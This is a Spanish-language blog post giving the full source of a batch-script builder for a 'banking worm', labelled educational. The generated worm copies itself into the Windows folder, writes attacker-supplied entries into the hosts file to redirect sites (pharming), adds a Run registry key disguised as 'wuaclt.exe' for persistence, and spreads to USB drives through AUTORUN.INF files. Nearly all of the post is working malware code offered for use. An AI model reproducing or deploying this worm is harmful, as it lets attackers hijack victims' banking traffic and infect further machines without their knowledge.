Código fuente de un generador de worm (gusano) programado en batch que envenena el archivo Host para realizar suplantaciones de IP ( Pharming ) además de contar con propagación de medios extraíbles ( Pendrives USB )
Código 100% Educativo para demostrar únicamente la facilidad en que un atacante puede afectarnos realizando este tipo de técnicas en nuestra contra.
setlocal EnableDelayedExpansion
color A
cls
title b4nking-w0rm by Octalh [ www.aztekmindz.org ]
echo.
echo.
echo [+]====================[ b4nking-worm ]====================[+]
echo _ _ __ __ _ _
echo /\ ^| ^| ^| ^| ^| \/ ^(_^) ^| ^|
echo / \ ___^| ^|_ ___^| ^| __ ^| \ / ^|_ _ __ __^| ^|____
echo / /\ \ ^|_ / __/ _ \ ^|/ / ^| ^|\/^| ^| ^| ‘_ \ / _` ^|_ /
echo / ____ \ / /^| ^|^| __/ ^< ^| ^| ^| ^| ^| ^| ^| ^| (_^| ^|/ /
echo /_/ \_\/___^|\__\___^|_^|\_\ ^|_^| ^|_^|_^|_^| ^|_^|\__,_/___^|
echo.
echo www.aztekmindz.org octalh@gmail.com
echo.
echo - Generador de Gusano bancario ^( Pharming ^) Batch
echo - Testeado XP SP2
echo - Programado con fines educativos
echo - El autor no se hace responsable de
echo usos malintencionados.
echo.
echo [+]====================[ b4nking-worm ]====================[+]
echo.
echo.
echo.
set /P nombre= [1] Ingrese nombre del gusano:
::header
echo @echo off >%nombre%.bat
echo :: + [ b4nking-worm ] + >>%nombre%.bat
echo :: www.aztekmindz.org octalh@gmail.com >>%nombre%.bat
echo :: - Generador Gusano bancario - >>%nombre%.bat
::copiado
echo COPY %%0 "%WINDIR%\%nombre%.bat" >>%nombre%.bat
echo.
set /P ch= [2] Ingrese cantidad de hosts a ingresar:
echo.
echo [3] Ingrese la IP y el host separados por un espacio:
echo Ejemplo: 127.0.0.1 localhost
echo.
echo SET htxt=C:\WINDOWS\system32\drivers\etc\hosts >>%nombre%.bat
echo IF EXIST %%htxt%% ( >>%nombre%.bat
echo echo # [+]====[ b4nking w0rm by octalh ]====[+] ^>^>%%htxt%% >>%nombre%.bat
FOR /L %%i IN (1,1,%ch%) DO (
::Host
echo [ Almacenando Host %%i de %ch% ]
set /P hs= Host:
echo echo !hs! ^>^>%%htxt%% >>%nombre%.bat
)
echo echo # [+]====[ b4nking w0rm by octalh ]====[+] ^>^>%%htxt%% >>%nombre%.bat
echo ) >>%nombre%.bat
echo ipconfig /flushdns >>%nombre%.bat
echo.
set /p ai= [4] Activar Autoinicio? S/N:
if %ai%==s (
::Autoinicio
echo REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v wuaclt.exe /t REG_SZ /d "%WINDIR%\%nombre%.bat" /f >> %nombre%.bat
)
echo.
set /p usb= [5] Activar Propagacion USB? S/N:
if %usb%==s (
::USB
echo :inicio >>%nombre%.bat
echo FOR %%%%A IN ^(D F G H I J K L M N O P Q R S T U V W X Y Z^) DO CALL :verificar %%%%A >>%nombre%.bat
echo GOTO :EOF >>%nombre%.bat
echo :verificar >>%nombre%.bat
echo IF EXIST "%%1:" ^(CALL :copiado %%1^) >>%nombre%.bat
echo GOTO :EOF >>%nombre%.bat
echo :copiado >>%nombre%.bat
echo COPY %nombre%.bat "%%1:\145782.bat" >>%nombre%.bat
echo echo [AUTORUN] ^> "%%1:\AUTORUN.INF" >>%nombre%.bat
echo echo shell\1=abrir ^>^>"%1:\AUTORUN.INF" >>%nombre%.bat
echo echo shell\1\Command="%nombre%.bat" ^>^>"%%1:\AUTORUN.INF" >>%nombre%.bat
echo echo shell\2=explorar ^>^>"%%1:\AUTORUN.INF" >>%nombre%.bat
echo echo shell\2\Command="%nombre%.bat" ^>^>"%%1:\AUTORUN.INF" >>%nombre%.bat
echo echo shellexecute= "\%nombre%.bat" ^>^>"%%1:\AUTORUN.INF" >>%nombre%.bat
echo ping -n 10 localhost >>%nombre%.bat
echo GOTO :inicio >>%nombre%.bat
)
echo.
echo [+]====================[ b4nking-worm ]====================[+]
echo.
echo [OK] Gusano editado con exito
echo.
echo Presione cualquier tecla para salir
echo.
echo +-+-+-+-+-+ +-+-+-+-+-+
echo ^|A^|z^|t^|e^|k^| ^|M^|i^|n^|d^|z^|
echo +-+-+-+-+-+ +-+-+-+-+-+
echo - www.aztekmindz.org ^| octalh@gmail.com -
echo.
echo [+]====================[ b4nking-worm ]====================[+]
echo.
echo.
pause>nul
Por: Octalh
Fuente: http://www.aztekmindz.org/
Deja un comentario
No hay comentarios.:
Publicar un comentario